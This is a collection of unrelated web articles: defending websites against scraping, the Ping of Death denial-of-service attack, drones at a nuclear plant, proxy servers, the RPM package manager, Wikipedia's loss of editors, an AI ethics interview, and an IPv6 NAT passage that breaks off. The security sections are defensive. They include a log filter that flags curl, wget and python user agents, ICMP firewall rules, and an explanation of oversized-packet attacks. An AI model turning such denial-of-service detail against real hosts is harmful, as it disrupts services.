You must keep in mind that everything that is visible and accessible on your website to human visitors is potentially also visible to scraping bots. There are some technical tricks that can be applied to secure the content, although these tricks often have their limitations. You can often recognise a scraping attempt by a high number of requests sent to your website from a single IP address (not to be confused with a DDoS attack, which also relies on this technique); you can then block that suspicious IP address. In other cases, locking content behind login details can go a long way, because the scraper then has to expose a piece of itself in order to reach the content. Regularly changing your HTML can confuse scrapers to such an extent that they give up and scrape elsewhere, although this approach can also lead to confusion among your own web developers. The use of CAPTCHAs or lots of media files can likewise discourage scraping attempts by shady individuals, but bots are sometimes coded to break specific CAPTCHA patterns or may employ third-party services that use human labor to solve CAPTCHA challenges in real time. On the legal side, companies need to take action against data scrapers and warn them against the practice; this can be included in the terms of service. That does not stop scraping by itself, but it can be used during lawsuits.
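As a rough illustration of the first tip, the noisiest client IPs can be pulled straight out of a web server's access log from the command line. The log path and the combined log format are assumptions here; a real deployment would feed this kind of signal into rate limiting or a bot-management service rather than relying on manual review.

# Count requests per client IP and list the 20 busiest sources
awk '{print $1}' /var/log/nginx/access.log | sort | uniq -c | sort -rn | head -20

# Show requests whose User-Agent is empty or looks like a script
awk -F'"' '$6 == "-" || $6 ~ /python|curl|wget/' /var/log/nginx/access.log | head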
Diverse actors leverage web scraping bots, including nefarious competitors, internet upstarts, cybercriminals, hackers and spammers, to effortlessly steal whatever pieces of content they are programmed to find, and they often mimic regular user behavior, making them hard to detect and even harder to block. Web scraping poses a critical challenge to a website's brand: it can threaten sales and conversions, lower SEO rankings, or undermine the integrity of content that took time and resources to produce. But there is an even bigger problem behind it, which lies in the growth of phishing attempts and ransomware attacks built on data scraped and stolen from the users of the attacked website. That is why web designers and social media companies should think hard about taking the necessary measures against this kind of attack in the future. Understanding the intrusive nature of today's web scraping danger not only raises awareness of this growing challenge, it also allows website owners to take action to protect their proprietary content and the privacy of their users! Let's hope they all read this blog.
A Ping of Death (PoD) is a type of Denial of Service (DoS) attack that deliberately sends IP packets larger than the maximum of 65,535 bytes allowed by the IP protocol. One of the features of TCP/IP is fragmentation, which allows a single packet to be broken down into smaller segments.
This DoS attack started back in the 1990s, when most operating systems didn't know what to do when they received an oversized packet, so they froze, crashed, or rebooted. Ping of Death attacks are particularly brutal because the identity of the attacker sending the oversized packet can easily be spoofed, and the attacker doesn't need to know anything about the victim except their IP address. By the end of the 90s, operating systems had made patches available to avoid the ping of death. Still, many sites block Internet Control Message Protocol (ICMP) ping messages at their firewalls to prevent any future variations of this kind of denial of service attack.
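As a small illustration (the target address 192.0.2.10 is a documentation address, and the iptables lines assume a Linux host; a dedicated firewall would use equivalent rules): a modern ping utility refuses to build an illegal packet in the first place, since the ICMP payload tops out at 65,507 bytes once the 20-byte IP and 8-byte ICMP headers are accounted for.

# Largest legal payload; anything bigger is rejected by ping itself
ping -s 65507 192.0.2.10
ping -s 65508 192.0.2.10   # fails with a "packet size too large" style error

# Filtering echo requests and ICMP fragments at the host firewall
iptables -A INPUT -p icmp --icmp-type echo-request -j DROP
iptables -A INPUT -p icmp -f -j DROP   # non-initial ICMP fragments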
What does this mean for an SMB?
A Distributed Denial of Service attack may pose a threat to gambling companies or other mid-to-large enterprises such as banks and defense contractors. DDoS attacks are rarely used against SMBs unless they upset a hacker group; in other cases, one hacking group attacks another.
We are not saying it won't happen, but because the cost of protection is so great, in many cases the advice to an SMB is to know what a DDoS attack is and to establish a relationship with a DDoS protection vendor without paying for protection up front. DDoS protection vendors include Arbor Networks, AT&T, Verizon, and Akamai. Mid-to-large enterprises should have contracts in place so they can protect themselves within seconds when hit with a DDoS attack; SMBs generally should not.
Falcon Eye Drones (FEDS) has underscored the importance of drones in increasing workplace safety while speeding up inspection measures to unlock the full potential of the Arab world’s sole Peaceful Nuclear Energy Programme—the Barakah Nuclear Energy Plant in Abu Dhabi—that aims to generate clean electricity in the next 60 years.
Hailing the launch of the UAE’s nuclear power plant, Rabih Bou Rashid, CEO of FEDS, said that drones can help ensure the gold standards of safety and reliability of the country’s US$32 billion power plant, which is expected to offset approximately 21 million tonnes of greenhouse gas emissions a year, or equivalent to removing 3.2 million cars from the country’s roads annually.
“The Barakah Nuclear Energy Plant is a significant step towards the UAE’s vision to deliver a new source of clean energy. It is a pioneering project that targets to deliver up to a quarter of the nation’s electricity needs, becoming a true milestone for this forward-thinking nation,” said Bou Rashid.
He noted that as the UAE remains committed to thrust science and technology, it is likely that it will employ only top-of-the-line technology, such as drones, in protecting and maintaining this Arab world’s pride.
Providing a clear insight about how drone applications are now being utilised in the nuclear industry today, the CEO said that drones play a vital role in site condition monitoring on nuclear sites across the globe because of its wide scope of advantages over these ground-based technologies.
An eye for safety
With the drones' ability to inspect confined spaces and areas beyond the human line of sight, FEDS said these unmanned aerial vehicles (UAVs) can perform flawless assessments and capture crucial data in nuclear power plants without putting the workforce in harm's way.
Prior to drones, Bou Rashid said, surveying nuclear power plants required workers to don heavy anti-contamination suits. They also needed to bring a radiation monitor, and such inspections exposed them to around 250 millirem of radiation (roughly 10% of the yearly limit for radiation exposure).
“Since drones are immune to radiation, inspectors can employ them to gather superior data—even around the most inaccessible spaces—without exposing workers to unnecessary dangers,” said Bou Rashid.
Recently, the Swiss drone manufacturer Flyability used its collision-resistant Elios 2 drones in an annual survey of the tank rooms at a nuclear power plant, capturing every edge of the area without the need for any human intervention.
The adoption of drones in the nuclear power sector was also accelerated by the accident at the Fukushima Daiichi Power Plant in 2011. Drones allowed responders to get a clear picture of the situation, as well as trace the changes in the reactors' isotopic distribution.
Flyability's data adds that drones are now utilised in over 30% of all nuclear power plants in the US. These UAVs are deployed regularly to avoid sending workers on physical inspections in radioactive environments, thereby increasing workplace safety.
In Norway, meanwhile, drone pilot Lieutenant Bård Alexander Raunlid said that they have entered a cooperation with the country’s Radiation and Nuclear Safety Authority in 2019 to utilise drone-based radiation detectors on Coast Guard vessels.
Gathering accurate mapping
Bou Rashid said that drones’ capacity to comprehensively post-process data can play a crucial role in completing the set-up and maintaining the operations of the Barakah Nuclear Energy Plant in the most cost-efficient way possible.
“UAVs provide a first-hand full perspective of the site that was previously unrealistic to obtain, as well as help inspectors identify any potential deviations that could, in the future, dent its budget and even pose dangers to workers,” he said.
The CEO also underscored how drones can record areas using photogrammetry, allowing inspectors to view the nuclear site from different angles. He added that the information captured by drones can also be used to build information models and even virtual reality systems to help inspectors truly immerse in the data.
Bou Rashid also noted that the accurate data-gathering features of drones can cut time wastage by 18.4%.
In an assessment carried out with the Elios 2 at the DSRL nuclear site, the time spent on tank inspection was cut from 1.5 hours to 15 minutes, he explained.
Meanwhile, Ontario Power Generation, dubbed Canada's largest clean energy project, decided to obtain a fleet of 18 drones in 2018 following its first aerial survey success in 2015. "With that acquisition, they got 100% photo record of the site through drones, which they have referred to many times since. This has saved them time from the traditional methods that involved a construction of a tall crane," Bou Rashid said.
He believes that through the adoption of parallel technology, the Barakah Nuclear Energy Plant will undoubtedly achieve its fullest potential and goals of providing sustainable electricity source.
“As the UAE once again sets the bar high in modern science through Barakah Nuclear Energy Plant, drones will be vital to the leaders’ objective of providing clean energy and commercially competitive option which could make a significant contribution to the UAE’s economy and future energy security,” said the FEDS CEO. | <urn:uuid:c68f6d48-8485-4aa5-8727-bc57777828c4> | CC-MAIN-2022-40 | https://internationalsecurityjournal.com/drones-utilised-to-protect-abu-dhabi-nuclear-power-plant/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00594.warc.gz | en | 0.927778 | 1,125 | 2.6875 | 3 |
A proxy server, which sits between a user and the Internet, provides a variety of benefits, including improved performance, security, and privacy. A proxy server is configured by specifying the IP address of the proxy server as its gateway to the Internet. This can be done for all traffic or only certain types of traffic (most commonly web traffic).
Configuring a proxy means that certain types of traffic will be sent to the proxy server instead of directly to the Internet. This allows the user to conceal their IP address from the websites, or an organization can use a proxy server to impose access controls and content filtering. The proxy server forwards the traffic on to its destination and sends any responses received on to its client.
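As a concrete illustration of pointing a client at a proxy for web traffic, here is a minimal command-line sketch. The proxy address 10.0.0.5 and port 3128 are hypothetical (3128 is a common port for Squid-style proxies), and most browsers and operating systems expose the same setting through their network preferences.

# Point command-line tools at the proxy via environment variables
export http_proxy="http://10.0.0.5:3128"
export https_proxy="http://10.0.0.5:3128"

# Or send a single request through the proxy explicitly
curl --proxy http://10.0.0.5:3128 https://example.com/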
Proxy servers all act to forward traffic from a client to a server and back again. However, a few different types of proxy servers exist, all with slightly different functionality. Common types include:
- Transparent proxies, which identify themselves as proxies and pass the client's real IP address along to the server
- Anonymous proxies, which identify themselves as proxies but conceal the client's IP address
- High-anonymity proxies, which conceal both the client's IP address and the fact that a proxy is being used at all
Proxy servers and virtual private networks (VPNs) are both designed to protect the user’s privacy. Yet they have slightly different goals and accomplish them in different ways.
Proxy Servers are primarily designed to protect the user from the server that it is connecting to. This may include concealing their identity (via anonymous proxies) or performing filtering of web traffic (such as blocking potentially malicious or inappropriate sites). Proxy servers are generally not designed to protect a user from third parties.
Remote Access VPNs are designed to protect the confidentiality of the connection between a client and a server. All traffic flows through an encrypted tunnel, which makes it impossible for eavesdroppers to view the traffic. However, the server at the other end of the connection has full access to the traffic, meaning that a VPN does nothing to protect a user’s privacy or security against a malicious server.
Both proxy servers and reverse proxies sit between a client and a server. They too are designed to provide different benefits.
Proxy servers are deployed on behalf of the client. One or more clients may use the same proxy server, which can provide increased privacy, security, etc.
Reverse proxies are designed to benefit the server. A reverse proxy server may act as a single point of content for multiple servers on an organization’s network. The use of a reverse proxy enables an organization to have sites served from multiple servers appear to originate from the same machine. Additionally, a reverse proxy can provide increased security by performing traffic filtering and by making it impossible for an external user to gain direct access to an organization’s servers.
A proxy server provides a number of benefits to its users, such as:
- Improved performance, since frequently requested content can be cached and served locally
- Increased privacy, because the user's IP address is concealed from the sites they visit
- Better security and control, through content filtering and access controls applied at a single point
While a proxy server has a number of benefits, it also has its limitations, including:
- Traffic between the client and the proxy is typically not encrypted, unlike with a VPN
- The proxy operator can see, and potentially log, all traffic that passes through it
- A single proxy can become a performance bottleneck or a single point of failure
- Applications generally need to be configured individually to use the proxy
A proxy server can be a standalone system, but it can also be integrated into an organization’s firewall. Check Point next-generation firewalls (NGFWs) integrate proxy functionality and are recognized as a Leader by Gartner. To learn more about Check Point NGFWs and their capabilities, you’re welcome to contact us. | <urn:uuid:95b5cb72-4e45-4bee-adc4-a5836db336cf> | CC-MAIN-2022-40 | https://www.checkpoint.com/cyber-hub/network-security/what-is-a-proxy-server/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00594.warc.gz | en | 0.951521 | 613 | 3.40625 | 3 |
If you’ve maintained a Linux system for a while, you’ve probably noticed that you have more and more files every day, especially if you install software. And unless you have a photographic memory, you’ll probably find it difficult to remember what files go with what piece of software, especially after months or years.
In fact, the problem is worse than that. Different packages can have subtle incompatibilities with other packages, especially if they were installed months or years apart. A shared library that was installed with one package might turn out to break another package. And if this problem doesn’t show up immediately, it may well show up a few weeks later when you’ve forgotten what changes you had made.
RPM can help dramatically with these problems; under most circumstances, it seems to Do the Right Thing in a rather magical way.
RPM stands for Red Hat Package Manager, and it keeps track of the packages you install. Among other things, it installs and removes packages cleanly, remembers which files belong to which package, and checks the dependencies between packages before making changes.
If it sounds too good to be true, it really isn’t. Most of the time, RPM silently installs and removes packages cleanly and correctly; the rest of the time, it warns you that you are trying to do something you shouldn’t.
Examples of use
Here are a few examples that show RPM in action.
Installing a package is as simple as:
(as 'root')
# rpm -i svgalib-1.2.10.rpm
This simple command installs version 1.2.10 of the package ‘svgalib’. Assuming you don’t have any version conflicts, RPM says nothing and your software is installed in the right place.
Removing a package is also simple:
# rpm -e svgalib
As long as no other RPM-installed package requires svgalib version 1.2.10, this will silently remove all the files that were installed with the previous command. (Note that you aren’t required to specify the version number! Under the reasonable assumption that you don’t have two versions of the same library installed, RPM removes the currently installed version.)
To query a package:
# rpm -q svgalib
svgalib-1.2.13-3
This command tells you what version you have installed currently.
To get a list of all installed packages:
# rpm -qa | head
setup-1.9.1-2
filesystem-1.3.1-3
basesystem-4.9-2
adjtimex-1.3-3
anonftp-2.5-1
ldconfig-1.9.5-3
[...]
This command presents a list of all packages, including version numbers, that have been installed with RPM.
To find out what a package requires:
# rpm -qR glibc
/sbin/ldconfig
Hmm, ‘glibc’ requires a file called /sbin/ldconfig. What else requires this file?
# rpm -q --whatrequires /sbin/ldconfig
ldconfig-1.9.5-3
glibc-2.0.7-13
libtermcap-2.0.8-7
[...]
Very interesting. However, most of the time you won’t need to find out this information; most installs and removals work perfectly, and you won’t have to investigate the tangled interdependencies between the packages.
RPM has become the most widely used package manager in the Linux world, in part because it works well, and in part because it is an integral part of the popular Red Hat distribution. Because of its popularity, RPMs can be found all over the place. People who offer their own software often build RPM distributions in addition to the time-honored .tar.gz ‘tarball’ format.
The Red Hat site itself has a huge collection of RPMs; these can also likely be found on the CD that you have if you bought the commercial version of Red Hat.
There’s also a much larger collection of RPMs here.
When you can’t use RPM
If your Linux install is old, you might have some trouble using RPM. This is not because RPM is a new thing but because many RPMs are binary RPMs. This means that they contain software that has already been compiled.
It is possible that the software was compiled using libraries or header files that are much newer (or older) than your own, and the binaries will not work on your system. In this case, you might have to build the software yourself and install it without the benefit of RPM; or you might be able to download a source RPM, which has many of the same features as a binary RPM but contains source code that is built on your system.
1. www.rpm.org: the central RPM site.
Greg Travis is a freelance programmer living in New York City. | <urn:uuid:e627beb7-46fc-4e9b-94f6-8838d807dc3b> | CC-MAIN-2022-40 | https://www.datamation.com/applications/using-rpm/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00594.warc.gz | en | 0.923514 | 1,058 | 2.75 | 3 |
Wikipedia, which is arguably the most valuable source of information on the Internet, is written and edited almost entirely by volunteers. But what happens when those volunteers stop volunteering?
We’re about to find out. In the first quarter of this year, the Wikipedia lost an incredible 49,000 editors, literally ten times the number lost in the same quarter last year.
Another potential threat to Wikipedia is that its expenses could outpace donations. Currently, the site runs on donations. But if the most die-hard fans are leaving — the writers and editors — they could take their donations with them.
As volunteerism goes down, successful acts of vandalism go up, and the resource becomes increasingly unreliable, which could cause even more people to leave and even fewer people to donate. Crowdsourcing is great — until the crowd goes somewhere else.
Sorry to be a Debbie Downer, but the death of Wikipedia is the least of our problems.
It Has Happened Before
A Web 2.0 site is one that by definition gets its value from the actions of users. But what happens when the best users stop using?
We have a huge precedent: American Democracy. Everybody complains about the power of special interests in politics. But those interests have moved in to fill the vacuum left behind by lower citizen participation. A lower percentage of people engage in politics at all levels than they used to, and even fewer keep themselves informed about political issues. The result is that a smaller percentage of people participate, and the sophistication of those people is lower, too.
That’s what will happen to the Wikipedia if present trends persist. The special interests and the saboteurs will have more power, because they will be controlled, contained and countered by a smaller number of dumber people.
Another example closer to home is what happened to the Digg social bookmarking service. Digg used to be a marvel of useful content. Mostly about tech, the site quickly and reliably surfaced the most important and interesting stories.
But two things wrecked it. First, Digg never fixed glaring flaws, namely the laughably inconsistent categorization of content and the ability of a tiny number of super users to completely dominate the service. Second, Digg introduced social communication, then abandoned it. A great many users invested countless hours and enormous energy building up a social network, only to have all those links erased by Digg. Digg has been experiencing an exodus of its own for the past year.
And look at Digg now. The home page is mostly garbage that falls into one of three categories: 1) sensationalist nonsense (“This is real footage of bears playing hockey, it’s so amazing”), 2) frivolous idiot content (“10 More Drunk Photos You Don’t Want to be Caught in”); and 3) pointless lists (“Top 10 Awesome Movie Ninjas”).
The degradation of Digg is nothing compared to other potential disasters lurking in the cloud.
What Happens When They Die?
We rely on Web 2.0 services like Wikipedia and Digg. But we’ve become dangerously reliant upon some “cloud” and online services. Many of these aren’t profitable, and rely on venture capital. In fact, it’s a near certainty that many of the services we rely on will not survive the next year or two. What happens when they go away?
What happens if they’re wiped out by hack attacks? It happened this year to AVSIM, a popular Microsoft’s Flight Simulator blog and message board site. Hackers destroyed all the user content, plus the backups of user content. Boom! Gone! Just like that.
What if they go out of business? The death of some sites would exact a terrible personal cost on many users. People rely heavily on sites like Evernote and other richly featured user-data sites; Posterous and other blog and lifestreaming sites; online backup sites like Carbonite; photo sites, calendar sites, task and to-do sites. The list goes on and on.
Some sites, such as Jott, reQall, Remember the Milk and others have become memory crutches that people rely on to function every day. If they vanish, a lot of people will be seen wandering around in the streets, forgetting the milk, etc.
Yet another class of web-based services help glue the whole Internet together. Twitter, for example, has triggered an explosion in the popularity of URL shorteners, including TinyURL, Bit.ly and others. People use shortened URLs to link things together. If the companies behind these sites go belly-up, the links vanish. A great many bloggers use photo services to host their pictures. If these crash and burn, the pictures vanish.
If the Great Recession is teaching us anything, it’s that everything can and will change. We need to proceed in our work and in our lives with the understanding that online services evolve and can even become extinct. We should consider every unprofitable startup an endangered species.
Always maintain at least two backups for everything — one online and remote, and one local. That’s old but good advice.
The new advice is be careful about which social networks you invest your time in. Your whole social network could be erased in an instant. And so, too, could URL shorteners, picture hosting sites, blog hosting sites and other services that require the survival of some vulnerable startup in order for your content to function in the future.
As great as the Wikipedia is, we can live without it. But the sites that hold our personal data, that glue the Internet together — we can’t live without those unless we’re prepared.
Optimism is a good quality. But sometimes we should listen to Debbie Downer. | <urn:uuid:a5fdcbc4-b19b-49ce-9ee5-80d46a6f2c37> | CC-MAIN-2022-40 | https://www.datamation.com/networks/the-wikipedia-exodus-is-the-least-of-our-worries/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00594.warc.gz | en | 0.934576 | 1,204 | 2.53125 | 3 |
The math is staggering: By 2020, there will be more than 50 billion connected devices on the internet.
But the bigger takeaway is that AI is already embedded in more than a billion of them.
Just ask Siri and Alexa.
Which brings us to the final installment of our conversation with AI expert and Duke University Computer Science Professor, Vincent Conitzer.
Conitzer agrees that we are on the cusp of an astonishing revolution in intelligent automation. But he also argues that being human still has its advantages.
Should we worry about AI taking over the planet? This may be an important question in the long run. But Conitzer says that today's AI is still far too limited for that.
On the other hand, he highlights controversial trends that are on the horizon right now: autonomous warfare, technological unemployment and bias in algorithms. He warns against hasty regulation of AI, and debunks some popular misconceptions about AI as well.
Hope you enjoy the conversation.
Appian: There's a lively debate going on around AI and ethics. What's your take on the ethics question? What do you see as the biggest ethical challenges facing AI?
Conitzer: One of the things I see in AI these days is that as we deploy AI in real-life settings, the objectives we pursue with it really start to matter. In the past, this wasn't a big concern, because AI was still in the laboratory... There's the example of reinforcement learning. This is a subtopic in AI where the system learns how to take action to optimize an objective.
For example, there's a problem where you have a cart moving along a track. And you have a pole standing on the cart that's connected to a hinge. So, there's risk of the pole falling over one way or the other. So, what the system is supposed to do is move the cart back and forth in such a way that the pole stays upright.
Appian: That's not an easy problem to solve.
Conitzer: No, it's not. And it's a good benchmark for algorithms. Specifying the objective is quite easy: that the pole doesn't fall over.
But let's face it. There aren't many people in the world that have to balance poles on carts. But as we move (laboratory) objectives into the real world, they start to matter.
Appian: You've also talked about something called supervised classification. What exactly is that, and how does it relate to AI?
Conitzer: That's a typical problem in machine learning. This is where we have lots of input data. For some of this data, we also have a label. For example, we may have lots of pictures, and some are labeled with who's in them. And we may want to give this data to an AI system and train it to determine, on its own, who is in each picture.
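(As an editorial aside: the toy Python sketch below, using scikit-learn, shows the shape of the supervised classification setup Conitzer describes. The feature values and labels are invented for illustration and are not from the interview.)

from sklearn.linear_model import LogisticRegression

# Labeled training data: each row is a feature vector, each label says who it belongs to.
X_train = [[0.1, 0.9], [0.2, 0.8], [0.9, 0.1], [0.8, 0.2]]
y_train = ["alice", "alice", "bob", "bob"]

clf = LogisticRegression()
clf.fit(X_train, y_train)          # learn from the labeled examples

# Ask the trained model to label inputs that were not in the training set.
print(clf.predict([[0.15, 0.85], [0.85, 0.15]]))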
Appian: Is that the same process that's used in speech recognition systems?
Conitzer: Yes. So, you might have a speech recognition system that you try to train on data in speech files. The goal is to be able to transcribe speech that wasn't in the data set. And you hope that the AI will learn how to do that in the laboratory.
Appian: So, how do you know when it's ready for the real world?
Conitzer: Well, one way is to track the percentage of decisions the system is getting right. But when you deploy a system like this in the world, there can be other issues.
Maybe you do really well on the majority dialect in the population. But you do poorly on a minority dialect. So, you could end up placing some people at a severe disadvantage.
And this is the kind of thing that really does happen.I remember when my kids were small, they tried to speak to Siri in my wife's iPhone. And it was amazing how wrongly it interpreted what they were asking. There probably weren't many children in their data set, so Siri didn't do well with my kids. So this wasn't a big deal. But you can think of other cases where this would be a serious problem.
Appian: Can you give some examples of that?
Conitzer: For example, tech companies like Google and Facebook want people to sign up for accounts. But they also want to detect accounts that don't correspond to real people. So, they ask for a person's name and other information to authenticate their identity. And one of the things that they try to do is figure out which accounts don't correspond to a real person.
So one of the factors you take into account when trying to determine if a person is real is their name. And it turns out that many Native American names share features with accounts that tend not to be real.
Appian: Can you give an example of that?
Conitzer: The names may have more words in them, which could be indicative of a fake account. So, Native American accounts were being classified as not real significantly more often than other customers.
Appian: So, the AI didn't spot the misclassification?
Conitzer: No, the AI system didn't understand any of the broader context of this. So, it unfairly disadvantaged an entire community of consumers.
So this is the kind of thing that we've got to be careful with, because simple objectives don't always give you good outcomes.
Appian: So, how do we guard against that kind of unintentional bias? How do we prevent it?
Conitzer: It's a difficult question. It's even hard to determine what we mean by a system that doesn't have any bias. There are different definitions that aren't always equivalent. So, there's that problem in the first place. But sometimes it's just obvious that something has gone wrong. I don't think there's a single method to eliminate AI bias.
I think it's good to have a diverse group of people involved in the creation of the software and inspecting the software.
The software should be tested for bias before it's deployed, so it doesn't create some of the bad outcomes we've been talking about.
Appian: On the topic of ethics, transparency and accountability, where do you come down on debate around regulation and AI. Should it be regulated? Or will regulation stifle innovation in the evolution of AI?
Conitzer: I'm not opposed to regulation. I think you have to look at it on a case by case basis. When you use AI to predict which ads somebody sees, that's different than using AI to decide whether or not somebody gets out on bail. Or if you're using AI to recommend sentences for people convicted of crimes.
When you regulate AI, you should have a good understanding of what the systems actually do, and what you're trying to achieve with the regulation.
The problem with hasty regulation, where people don't understand what they're regulating and why, is that it's not likely to be beneficial.
But there are cases where regulation is appropriate. When you're talking about law enforcement, and you're trying to decide whether somebody gets out on bail, these AI systems should be transparent and accountable.
Appian: Speaking of accountability, there's a strong debate going on around AI and accountability. What do you make of that debate?
Conitzer: Think about self-driving cars. When an accident happens, who is responsible? That can be a difficult question. We have clear traffic rules, and we know what's expected. When AI systems take over, and something bad happens, it's sometimes more difficult to decide exactly what went wrong and where to assign responsibility.
Is the original programmer at fault, or perhaps it's the fault of the person who provided the data that the system was trained on? These are tricky questions that people in the legal world are thinking about very hard.
Appian: You've heard the hype around AI. Of all of things that you've read about, what's the biggest misconception about the capabilities of AI?
Conitzer: I think on one hand, there's been tremendous advancement in the evolution of AI. So, the fact that progress has been made isn't a misconception. That said, I think people tend to extrapolate a little too far. One of the tricky things in AI has always been that what we perceive as things that really require intelligence aren't always the things that are hard for AI systems to do.
Appian: Can you give us some examples of this AI myth?
Conitzer: Before AI, in the early days of computer science, we may have thought that the game of chess was reflective of the highest form of human intelligence. We assumed that someone who plays chess well is really an intelligent person. But later on, we found out that playing chess might be easier than playing soccer. There are people working on AI soccer. You should look at the work they're doing. It can be very entertaining.
The point is that our own concept of where we're intelligent in ways that other things aren't has changed as a result of AI research.
Sometimes this comes as a frustration to AI researchers, because if they solve a problem that's deemed to be a benchmark for AI, the benchmarking goal post gets moved. Which leads to frustration for the people who solved it.
Appian: So our own concept of what is unique about being human is always shifting, as a result of AI research.
Conitzer: Yes, but will it always be that way? I don't know. There are people who are genuinely concerned about AI becoming broadly more intelligent than humans. Not just on narrow tasks, but AI that is equally flexible and as broad in understanding as humans. There are all kinds of disaster scenarios that can unfold from that.
Appian: What do you make of that fear of general AI?
Conitzer: It's been difficult for the AI community to approach that question.
The AI community used to make bold predictions. But many of them didn't come true, because solving the problems was harder than people thought.
So, the community has pulled back from making bold predictions.
Appian: But people outside of the community have started to raise those concerns.
Conitzer: Yes, but the issue of timing is important.
Some concerns are really on the horizon right now, like autonomous weapons, technological unemployment, bias in algorithms.
These things are happening right now. And we need to be concerned about them. But AI taking over the world? That's more futuristic.
Appian: So, AI taking over the world is not something we need to worry about today?
Conitzer: Today's algorithms can't achieve that. It's not crazy to think about those things. So, I'm supportive of the people who do. But it's important to keep in mind that we're talking about different time scales and different levels of uncertainty.
Appian: Speaking of the future, as you think about 2019 and beyond, what do you expect to see in terms of AI trends, especially as it relates to ethics and accountability?
Conitzer: Near term, we'll see a lot of successes achieved on the machine learning side and pattern recognition techniques. I think we'll start to see them deployed in the real world in many different places. As that trend happens, it will also generate new problems that people didn't anticipate.
Appian: Can you give us an example?
Conitzer: Yes, one will be that just recognizing patterns may not be enough. We're already seeing this in self-driving cars.
The AI systems in our cars don't just detect patterns, but they're also capable of taking corrective action, based on what they perceive. We're going to see much more of this kind of AI in the near term.
Appian: And how does ethics fit into that narrative?
Conitzer: Generally, these systems will require you to specify some high-level objective to pursue. Any C-level executive knows that the objective that you give someone to pursue should be specified in the right way. Or you won't get the results that you expect.
The same is true of AI systems: If you specify the wrong objective, you may be surprised by the outcome that you get.
Appian is the unified platform for change. We accelerate customers’ businesses by discovering, designing, and automating their most important processes. The Appian Low-Code Platform combines the key capabilities needed to get work done faster, Process Mining + Workflow + Automation, in a unified low-code platform. Appian is open, enterprise-grade, and trusted by industry leaders. | <urn:uuid:61f278a3-aafd-4904-a36d-13396b4182d1> | CC-MAIN-2022-40 | https://appian.com/blog/2019/will-ai-make-humans-obsolete-not-in-the-short-run-part-2-.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00594.warc.gz | en | 0.972651 | 2,623 | 2.71875 | 3 |
Plain talk about the Advantages and Disadvantages of NAT
By Owen DeLong and Scott Hogg
Dual stack is the most preferred IPv6 transition strategy and tunneling IPv6 packets within IPv4 packets is considered less optimal.
Of all the IPv6 transition techniques that exist, “Translation” is considered the least attractive.
IPv6 purists and protocol designers have long resisted the idea of allowing NAT for IPv6.
Yet today there is a function called Network Prefix Translation (NPT) which is similar to NAT, but different.
This article goes into detail about the reasons to use NAT, the disadvantages NAT brings, and seeks to help the reader make an informed decision about what is right for their particular environment.
You may have seen the popular and amusing video on this subject (http://www.youtube.com/watch?v=v26BAlfWBm8), which hits remarkably close to the mark. IPv6 proponents have significantly resisted allowing NAT to be used with IPv6. The fear is that there would be demand for a system similar to what is used for IPv4, where many private IPv4 addresses are hidden behind a single public IPv4 address (technically known as NAPT (Network Address and Port Translation), or PAT (Port Address Translation) for short). The concern is that PAT would ruin the end-to-end model that IPv6 has so long hoped to restore. The original intent of IP communications was that hosts would communicate directly using their assigned IP addresses. Since translation changes the source address of the packet on its way to the destination, the destination is not communicating with the original source address. This type of PAT system is not needed for IPv6 because there is no scarcity of IPv6 addresses.
Are there Private addresses for IPv6?
IPv4 has RFC-1918 addresses that can be used in private networks isolated from the Internet. IPv6 also provides for a type of “private” addressing. Unique Local Addresses (ULA) are addresses that an organization can use for non-Internet communications on private networks.
Unique Local Addresses (ULA) are documented here: http://tools.ietf.org/html/rfc4193. This FC00::/7 address block has been allocated by the Internet Assigned Number Authority (IANA) and is broken into FC00::/8 which is reserved and FD00::/8 which organizations can use internal to their organizations. The RFC stipulates that organizations must generate a 40-bit random number to fill in the bits after the “FD” hex digits. The first 8 bits for “FD” (1111 1101) combined with the 40-bit random number provide for a /48 prefix that can be sub-netted and used inside an organization’s internal networks.
The generation of the random number should prevent any possible conflicts between organizations who are also using ULA space internally. The random number gives the “unique” aspect of unique-local. Therefore, two organizations can collaborate or merge and there probably won’t be any address overlap situations like occur today with RFC-1918 IPv4 addresses.
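A simplified sketch of that generation step is shown below in Python: it draws a 40-bit random number and appends it to the FD prefix to form a ULA /48. (RFC 4193 actually suggests deriving the number from a hash of a timestamp and a machine identifier, so treat this as an approximation rather than the exact algorithm.)

import secrets
import ipaddress

global_id = secrets.randbits(40)                  # 40-bit random Global ID

# FD00::/8 plus the 40-bit Global ID gives the 48-bit ULA prefix.
prefix_value = (0xFD << 40) | global_id
ula_prefix = ipaddress.IPv6Network((prefix_value << 80, 48))

print(ula_prefix)                                 # e.g. fd3a:91c2:77e5::/48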
Limitations/restrictions of ULA space are similar to the usage limitations of RFC-1918 addresses. They can be routed between organizations by agreement, but should not generally be leaked into internet routing tables. As noted above, they do not suffer from the limitation on uniqueness that RFC-1918 addresses have. These ULA addresses are only intended to be used internally and never used for Internet communications. Hence the word “Local” in the ULA name.
When might NAT be useful for IPv6?
IPv6 was originally intended to use a completely hierarchical addressing system where organizations received their IPv6 addresses from their service providers. However, that didn't easily allow for multi-homing to multiple ISPs. Many enterprise organizations use BGP today to advertise their own public IPv4 addresses to multiple ISPs and have independence. That hierarchical addressing requirement has been lifted, and organizations may be granted Provider Independent (PI) IPv6 address blocks if they meet the requirements of the Regional Internet Registry (RIR). PI IPv6 addresses can be used with BGP for multi-homing, just like an organization's own public IPv4 addresses. Each RIR has its own specific requirements. As an example, to qualify in the ARIN region, you must meet one of the following criteria:
- Operate critical Infrastructure (Root nameservers, Exchange points, etc.)
- Be multi-homed or immediately becoming multi-homed. (Hold an ASN and 2 or more peering or transit contracts)
- Have a network that makes active use of at least 2000 IPv6 addresses within 12 months
- Have a network that makes active use of at least 200 /64 subnets within 12 months
- Provide a reasonable technical justification indicating why provider assigned addresses would be unsuitable to your application.
